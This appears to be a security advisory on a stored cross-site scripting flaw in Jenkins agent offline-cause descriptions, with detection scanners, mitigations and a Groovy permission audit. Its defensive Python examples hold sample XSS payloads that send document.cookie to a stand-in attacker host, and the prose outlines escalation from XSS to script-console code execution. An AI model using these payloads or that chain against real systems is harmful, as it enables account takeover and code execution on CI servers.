CVE-2026-53441 Overview
CVE-2026-53441 is a stored cross-site scripting (XSS) vulnerability in Jenkins, the widely deployed open-source automation server. The flaw exists in Jenkins versions 2.483 through 2.567 and LTS versions 2.492.1 through 2.555.2. Jenkins does not escape the user-provided description of a generic offline cause that can be set through the POST config.xml API. An authenticated attacker with Agent/Configure permission can therefore inject arbitrary HTML or JavaScript that executes in the browser of any other Jenkins user who views the affected agent's page.
Critical Impact
Authenticated attackers with Agent/Configure permission can inject persistent JavaScript that runs in the session of every other Jenkins user who views the agent page. Because the Jenkins session cookie is normally flagged HttpOnly, the practical outcome is not cookie theft but same-origin requests issued as the victim; when the victim is an administrator, that amounts to privilege escalation within the CI/CD environment.
Affected Products
- Jenkins 2.483 through 2.567 (inclusive)
- Jenkins LTS 2.492.1 through 2.555.2 (inclusive)
- Any affected instance on which a non-administrative account holds Agent/Configure; the config.xml endpoint is part of the core REST API and is reachable by any account holding that permission
Discovery Timeline
- 2026-06-10 - CVE-2026-53441 published to NVD alongside Jenkins Security Advisory SECURITY-3731
- 2026-06-10 - Last updated in NVD database
Technical Details for CVE-2026-53441
Vulnerability Analysis
The vulnerability is a stored cross-site scripting issue [CWE-79] affecting the agent offline-cause subsystem in Jenkins. When an agent is taken offline, Jenkins records a description explaining the cause. This description can be set programmatically through the POST config.xml API endpoint. Jenkins fails to escape HTML metacharacters in this user-controlled description before rendering it in the web UI.
Any user viewing the affected agent page, including administrators, executes the injected payload in their browser session. Because the payload is persistent, every subsequent visit triggers execution until the description is cleared or the instance is patched.
Root Cause
The root cause is missing output encoding on the offline cause description field. The view that renders agent status emits the stored string as markup instead of escaping it as untrusted text. Nothing on the input side compensates: the config.xml endpoint accepts arbitrary XML and stores the decoded string as-is, and Jenkins relies on escaping at render time rather than on input filtering, so raw HTML and <script> content reaches the data store unchanged.
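To make the root cause concrete, here is an added Python illustration; it is not Jenkins code (the real view is Jelly/Java) and the wrapper element, function names and payloads are assumptions. It contrasts the defective rendering with an input-side blocklist, which the event-handler payload slips past, and with output encoding, which neutralizes both, and uses Python's own HTML parser to show what a browser would treat as active content:

```python
import html
import re
from html.parser import HTMLParser

# Constructed descriptions. The two payloads are illustrative, not from any public exploit.
DESCRIPTIONS = {
    "script_tag": "<script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>",
    "event_handler": "<img src=x onerror=\"fetch('https://attacker.invalid/?c=' + document.cookie)\">",
    "benign": "Disk full on /var/lib/jenkins & awaiting cleanup (ticket #123)",
}

WRAPPER = '<div class="offline-cause">{}</div>'   # stand-in for the agent status view
SCRIPT_TAG_RE = re.compile(r"</?\s*script[^>]*>", re.IGNORECASE)


def render_vulnerable(description):
    """Interpolates the stored description as if it were trusted markup (the defect)."""
    return WRAPPER.format(description)


def render_input_blocklist(description):
    """A tempting but wrong fix: strip <script> on the way in, still render raw."""
    return WRAPPER.format(SCRIPT_TAG_RE.sub("", description))


def render_fixed(description):
    """Output encoding: every HTML metacharacter becomes an entity at render time."""
    return WRAPPER.format(html.escape(description, quote=True))


class _ActiveContent(HTMLParser):
    """Collects the start tags and on* attributes a browser would act on."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def active_content(fragment):
    """Return (tags, event_handlers) that an HTML parser extracts from the fragment."""
    parser = _ActiveContent()
    parser.feed(fragment)
    parser.close()
    return parser.tags, parser.handlers


if __name__ == "__main__":
    renderers = (("vulnerable", render_vulnerable),
                 ("input-blocklist", render_input_blocklist),
                 ("fixed", render_fixed))
    for name, desc in DESCRIPTIONS.items():
        for label, render in renderers:
            tags, handlers = active_content(render(desc))
            print(f"{name:14} {label:16} tags={tags} handlers={handlers}")
```

The blocklist variant is included because it is the fix people reach for first: it removes the script tag but leaves the img/onerror payload intact, whereas escaping at output time leaves only the wrapper element for the browser to act on, with the benign ampersand correctly rendered as an entity.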
Attack Vector
An attacker needs an authenticated account holding Agent/Configure. The attacker submits a crafted XML document to the agent's config.xml endpoint (POST /computer/<agent-name>/config.xml) with script content in the offline cause description element, and Jenkins persists it. When a higher-privileged user, such as a Jenkins administrator, opens the agent page, the script runs in that user's session. The Jenkins session cookie is normally flagged HttpOnly, so direct cookie theft is not the usual outcome; the script instead issues same-origin requests as the victim, which can include fetching a CSRF crumb and then submitting authenticated POST requests. If the victim holds Overall/Administer, that reaches the script console and therefore arbitrary code execution on the Jenkins controller.
No verified public exploit code is available. Refer to the Jenkins Security Advisory SECURITY-3731 for vendor technical details.
Detection Methods for CVE-2026-53441
Indicators of Compromise
- Agent config.xml files whose offline cause description text decodes to HTML tags such as <script>, <img>, or <svg>; the XML serializer stores < and > as &lt; and &gt;, so search for the escaped form or parse the file rather than grepping for a literal <script>
- HTTP POST requests to /computer/<agent-name>/config.xml from accounts with Agent/Configure but not administrative permissions
- Audit log entries showing agent configuration changes from unexpected user accounts or service tokens
Detection Strategies
- Parse $JENKINS_HOME/nodes/*/config.xml and inspect the decoded text of description fields for embedded markup; the files hold HTML metacharacters XML-escaped (&lt;, &gt;), so a plain grep for <script> will miss them
- Monitor reverse proxy and Jenkins access logs for POST requests to /computer/<agent-name>/config.xml; the configuration form in the UI posts to /computer/<agent-name>/configSubmit instead, so the config.xml path isolates API-driven changes
- Watch for unexpected script activity on agent status pages, for example through browser-side telemetry or a report-only Content Security Policy added at the reverse proxy, and forward those reports to the SIEM
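The on-disk and access-log checks above, as an added Python example that is not part of the advisory or of Jenkins itself. The node documents and log lines are constructed; the combined access-log format, the optional context path, and the element names in the sample XML are assumptions (the real element carrying the offline cause may be named differently, which is why the scanner inspects every text node rather than one named field). Separating API-driven from form-driven changes relies on the UI configuration form posting to /computer/<name>/configSubmit while the REST API uses /computer/<name>/config.xml:

```python
import os
import re
import tempfile
import urllib.parse
import xml.etree.ElementTree as ET

# Decoded text that looks like a tag, an on* event handler, or a javascript: URL.
# Broad on purpose: an offline cause or node description should be plain text.
MARKUP_RE = re.compile(r"<\s*/?[a-zA-Z!]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def suspicious_text_nodes(xml_bytes):
    """Return [(element_path, decoded_text)] for text nodes that look like markup.

    Parsing matters: the serializer writes '<' as '&lt;', so a literal
    '<script>' never appears in config.xml on disk and a plain grep misses it.
    """
    hits = []

    def walk(elem, path):
        here = f"{path}/{elem.tag}"
        if elem.text and MARKUP_RE.search(elem.text):
            hits.append((here, elem.text.strip()))
        for child in elem:
            walk(child, here)

    walk(ET.fromstring(xml_bytes), "")
    return hits


def scan_nodes_dir(jenkins_home):
    """Scan <jenkins_home>/nodes/*/config.xml and return {agent_name: hits}."""
    findings = {}
    nodes_dir = os.path.join(jenkins_home, "nodes")
    if not os.path.isdir(nodes_dir):
        return findings
    for agent in sorted(os.listdir(nodes_dir)):
        cfg = os.path.join(nodes_dir, agent, "config.xml")
        if os.path.isfile(cfg):
            with open(cfg, "rb") as fh:
                hits = suspicious_text_nodes(fh.read())
            if hits:
                findings[agent] = hits
    return findings


# Access-log side (combined log format assumed). The REST endpoint is
# POST /computer/<name>/config.xml; the UI form posts to /computer/<name>/configSubmit,
# so matching on config.xml isolates API-driven changes. An optional context path
# (e.g. /jenkins) is allowed before /computer/.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"POST (?P<prefix>\S*?)/computer/(?P<agent>[^/\s"]+)/config\.xml[\s?"]'
)


def config_xml_posts(log_lines):
    """Return [(user, agent_name)] for POST requests to an agent's config.xml."""
    out = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if m:
            out.append((m.group("user"), urllib.parse.unquote(m.group("agent"))))
    return out


# Constructed sample data, not real Jenkins files or logs. The element that carries
# the offline cause in a real file may be named differently; the scanner walks every
# text node, so the check does not depend on that name.
MALICIOUS_NODE_XML = b"""<slave>
  <name>build-01</name>
  <description>&lt;img src=x onerror=alert(document.domain)&gt;</description>
</slave>"""
BENIGN_NODE_XML = b"""<slave>
  <name>build-02</name>
  <description>Linux builder &amp; test runner (rack 3)</description>
</slave>"""
SAMPLE_LOG_LINES = [
    '10.0.0.5 - alice [10/Jun/2026:12:00:01 +0000] "POST /computer/build-01/config.xml HTTP/1.1" 200 0',
    '10.0.0.5 - alice [10/Jun/2026:12:00:02 +0000] "GET /computer/build-01/config.xml HTTP/1.1" 200 812',
    '10.0.0.9 - bob [10/Jun/2026:12:01:00 +0000] "POST /jenkins/computer/linux%20box/config.xml HTTP/1.1" 200 0',
    '10.0.0.7 - carol [10/Jun/2026:12:02:00 +0000] "POST /computer/build-02/configSubmit HTTP/1.1" 302 0',
]


def build_sample_home():
    """Write the constructed node files into a temporary JENKINS_HOME layout."""
    home = tempfile.mkdtemp(prefix="jenkins_home_")
    for name, body in (("build-01", MALICIOUS_NODE_XML), ("build-02", BENIGN_NODE_XML)):
        os.makedirs(os.path.join(home, "nodes", name))
        with open(os.path.join(home, "nodes", name, "config.xml"), "wb") as fh:
            fh.write(body)
    return home


if __name__ == "__main__":
    for agent, hits in scan_nodes_dir(build_sample_home()).items():
        print(agent, hits)
    print(config_xml_posts(SAMPLE_LOG_LINES))
```

Against a live controller, call scan_nodes_dir with the real JENKINS_HOME and feed config_xml_posts the proxy's access log; cross-check every user it returns against the Agent/Configure audit before treating a change as hostile, since configuration-as-code tooling also uses the config.xml endpoint.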
Monitoring Recommendations
- Forward Jenkins audit logs and config.xml change events to a centralized log platform for correlation against user permission assignments
- Alert on modifications to agent offline cause descriptions made through the config.xml endpoint rather than the UI form (configSubmit), and on any such change by an account that is not expected to manage agents
- Track outbound requests from Jenkins user browsers to unknown domains, which can indicate XSS payload callbacks
How to Mitigate CVE-2026-53441
Immediate Actions Required
- Upgrade Jenkins weekly releases to a version newer than 2.567 and LTS releases to a version newer than 2.555.2 as published in the vendor advisory
- Audit all accounts holding the Agent/Configure permission and remove the grant from users who do not require agent management
- Review existing agent configurations for malicious markup in offline cause descriptions and clear or rewrite affected entries as plain text
Patch Information
Jenkins addresses CVE-2026-53441 in the fixed releases referenced in the Jenkins Security Advisory SECURITY-3731. The fix introduces proper HTML escaping on the offline cause description before rendering. Apply the upgrade through the standard Jenkins update process and restart the controller to load the patched code.
Workarounds
- Restrict the Agent/Configure permission to trusted administrators until the upgrade is complete
- Block POST requests to /computer/*/config.xml at the reverse proxy until the upgrade is complete; the proxy usually cannot tell Jenkins roles apart, so expect this to also break automation that legitimately updates agents through the API
- Add a Content Security Policy that blocks inline scripts on Jenkins UI pages where feasible; many plugins still rely on inline scripts, so deploy it in report-only mode first and test before enforcing
// Example: identify users granted Agent/Configure via the Jenkins script console
// Navigate to Manage Jenkins > Script Console and run:
import jenkins.model.Jenkins
import hudson.model.Computer
import hudson.model.User
def jenkins = Jenkins.get()
// Check each known user against every agent: project-based matrix strategies can grant Agent/Configure per node, so an instance-wide check alone would miss those grants
User.getAll().each { user ->
    def auth = user.impersonate2()   // Spring Security Authentication for this user; throws if the user no longer exists in the realm
    def agents = jenkins.computers.findAll { c -> c.hasPermission2(auth, Computer.CONFIGURE) }
    if (agents) {
        def admin = jenkins.hasPermission2(auth, Jenkins.ADMINISTER) ? ' (also Overall/Administer)' : ''
        println "User with Agent/Configure: ${user.id}${admin} on ${agents*.displayName.join(', ')}"
    }
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

